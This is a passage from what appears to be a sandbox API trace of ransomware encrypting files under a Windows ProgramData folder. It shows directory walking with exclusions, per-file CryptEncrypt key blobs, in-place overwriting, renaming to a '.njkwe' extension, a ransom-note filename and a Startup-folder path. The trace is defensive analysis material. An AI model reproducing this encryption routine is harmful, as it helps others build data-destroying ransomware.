returned -1 [0069.315] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.315] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\.") returned 103 [0069.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.316] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a320d06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a49e573, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.316] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.316] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.316] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.316] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.316] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.316] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\..") returned 104 [0069.316] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.316] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.316] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a346f8d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a346f8d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd19cd600, ftLastWriteTime.dwHighDateTime=0x1d32052, nFileSizeHigh=0x0, nFileSizeLow=0x5bec, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0069.316] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Windows") returned -1 [0069.316] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="$Recycle.bin") returned 1 [0069.316] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="System Volume Information") returned -1 [0069.316] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files") returned -1 [0069.316] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files (x86)") returned -1 [0069.316] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\MasterDescriptor.en-us.xml") returned 128 [0069.316] StrStrIW (lpFirst="MasterDescriptor.en-us.xml", lpSrch=".njkwe") returned 0x0 [0069.316] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.316] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="taridd") returned -1 [0069.316] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\Maste", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.316] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.316] GetTickCount () returned 0x1151b54 [0069.316] GetTickCount () returned 0x1151b54 [0069.316] GetTickCount () returned 0x1151b54 [0069.316] GetTickCount () returned 0x1151b54 [0069.316] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.317] GetProcessHeap () returned 0xbe0000 [0069.317] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.317] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.386] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.386] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.386] GetProcessHeap () returned 0xbe0000 [0069.386] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.386] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.386] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.391] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.391] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.392] CloseHandle (hObject=0x43c) returned 1 [0069.392] GetProcessHeap () returned 0xbe0000 [0069.392] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.392] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe") returned 148 [0069.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\masterdescriptor.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.392] GetProcessHeap () returned 0xbe0000 [0069.392] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.392] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a36d2e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a36d2e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x918a2300, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0069.392] lstrcmpiW (lpString1="s321033.hash", lpString2="Windows") returned -1 [0069.392] lstrcmpiW (lpString1="s321033.hash", lpString2="$Recycle.bin") returned 1 [0069.392] lstrcmpiW (lpString1="s321033.hash", lpString2="System Volume Information") returned -1 [0069.393] lstrcmpiW (lpString1="s321033.hash", lpString2="Program Files") returned 1 [0069.393] lstrcmpiW (lpString1="s321033.hash", lpString2="Program Files (x86)") returned 1 [0069.393] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s321033.hash") returned 114 [0069.393] StrStrIW (lpFirst="s321033.hash", lpSrch=".njkwe") returned 0x0 [0069.393] lstrcmpW (lpString1="s321033.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.393] lstrcmpW (lpString1="s321033.hash", lpString2="taridd") returned -1 [0069.393] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s3210", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.393] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s321033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\s321033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.393] GetTickCount () returned 0x1151ba2 [0069.393] GetTickCount () returned 0x1151ba2 [0069.393] GetTickCount () returned 0x1151ba2 [0069.393] GetTickCount () returned 0x1151ba2 [0069.393] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.393] GetProcessHeap () returned 0xbe0000 [0069.393] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.393] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x66, lpOverlapped=0x0) returned 1 [0069.394] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.394] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x66, lpOverlapped=0x0) returned 1 [0069.394] GetProcessHeap () returned 0xbe0000 [0069.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.394] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.394] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.395] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.395] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.396] CloseHandle (hObject=0x43c) returned 1 [0069.396] GetProcessHeap () returned 0xbe0000 [0069.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.396] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s321033.hash_r00t_{3sXlE5}.njkwe") returned 134 [0069.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s321033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\s321033.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\s321033.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\s321033.hash_r00t_{3sxle5}.njkwe")) returned 1 [0069.396] GetProcessHeap () returned 0xbe0000 [0069.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.396] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a36d2e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a36d2e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x918a2300, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x1dff67, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.Platform.Culture.man.xml", cAlternateFileName="STREAM~1.XML")) returned 1 [0069.396] lstrcmpiW (lpString1="stream.Platform.Culture.man.xml", lpString2="Windows") returned -1 [0069.396] lstrcmpiW (lpString1="stream.Platform.Culture.man.xml", lpString2="$Recycle.bin") returned 1 [0069.396] lstrcmpiW (lpString1="stream.Platform.Culture.man.xml", lpString2="System Volume Information") returned -1 [0069.396] lstrcmpiW (lpString1="stream.Platform.Culture.man.xml", lpString2="Program Files") returned 1 [0069.396] lstrcmpiW (lpString1="stream.Platform.Culture.man.xml", lpString2="Program Files (x86)") returned 1 [0069.396] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.Platform.Culture.man.xml") returned 133 [0069.396] StrStrIW (lpFirst="stream.Platform.Culture.man.xml", lpSrch=".njkwe") returned 0x0 [0069.396] lstrcmpW (lpString1="stream.Platform.Culture.man.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.396] lstrcmpW (lpString1="stream.Platform.Culture.man.xml", lpString2="taridd") returned -1 [0069.396] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\strea", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.platform.culture.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.398] GetTickCount () returned 0x1151ba2 [0069.398] GetTickCount () returned 0x1151ba2 [0069.398] GetTickCount () returned 0x1151ba2 [0069.398] GetTickCount () returned 0x1151ba2 [0069.398] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.398] GetProcessHeap () returned 0xbe0000 [0069.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.399] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.569] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.570] GetProcessHeap () returned 0xbe0000 [0069.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.570] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.572] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.572] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.572] CloseHandle (hObject=0x43c) returned 1 [0069.573] GetProcessHeap () returned 0xbe0000 [0069.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.573] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.Platform.Culture.man.xml_r00t_{3sXlE5}.njkwe") returned 153 [0069.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.platform.culture.man.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.Platform.Culture.man.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.platform.culture.man.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.573] GetProcessHeap () returned 0xbe0000 [0069.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.574] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a49e573, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8f27c900, ftLastWriteTime.dwHighDateTime=0x1d32053, nFileSizeHigh=0x0, nFileSizeLow=0x80, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.en-us.hash", cAlternateFileName="STREAM~1.HAS")) returned 1 [0069.574] lstrcmpiW (lpString1="stream.x86.en-us.hash", lpString2="Windows") returned -1 [0069.574] lstrcmpiW (lpString1="stream.x86.en-us.hash", lpString2="$Recycle.bin") returned 1 [0069.574] lstrcmpiW (lpString1="stream.x86.en-us.hash", lpString2="System Volume Information") returned -1 [0069.574] lstrcmpiW (lpString1="stream.x86.en-us.hash", lpString2="Program Files") returned 1 [0069.574] lstrcmpiW (lpString1="stream.x86.en-us.hash", lpString2="Program Files (x86)") returned 1 [0069.574] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.hash") returned 123 [0069.574] StrStrIW (lpFirst="stream.x86.en-us.hash", lpSrch=".njkwe") returned 0x0 [0069.574] lstrcmpW (lpString1="stream.x86.en-us.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.574] lstrcmpW (lpString1="stream.x86.en-us.hash", lpString2="taridd") returned -1 [0069.574] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\strea", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.574] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.574] GetTickCount () returned 0x1151c5e [0069.574] GetTickCount () returned 0x1151c5e [0069.574] GetTickCount () returned 0x1151c5e [0069.574] GetTickCount () returned 0x1151c5e [0069.574] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.574] GetProcessHeap () returned 0xbe0000 [0069.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.574] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.576] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffff80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.576] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.576] GetProcessHeap () returned 0xbe0000 [0069.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.576] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.576] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.576] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.577] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.577] CloseHandle (hObject=0x43c) returned 1 [0069.577] GetProcessHeap () returned 0xbe0000 [0069.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.577] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.hash_r00t_{3sXlE5}.njkwe") returned 143 [0069.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\stream.x86.en-us.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\en-us.16\\stream.x86.en-us.hash_r00t_{3sxle5}.njkwe")) returned 1 [0069.577] GetProcessHeap () returned 0xbe0000 [0069.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: 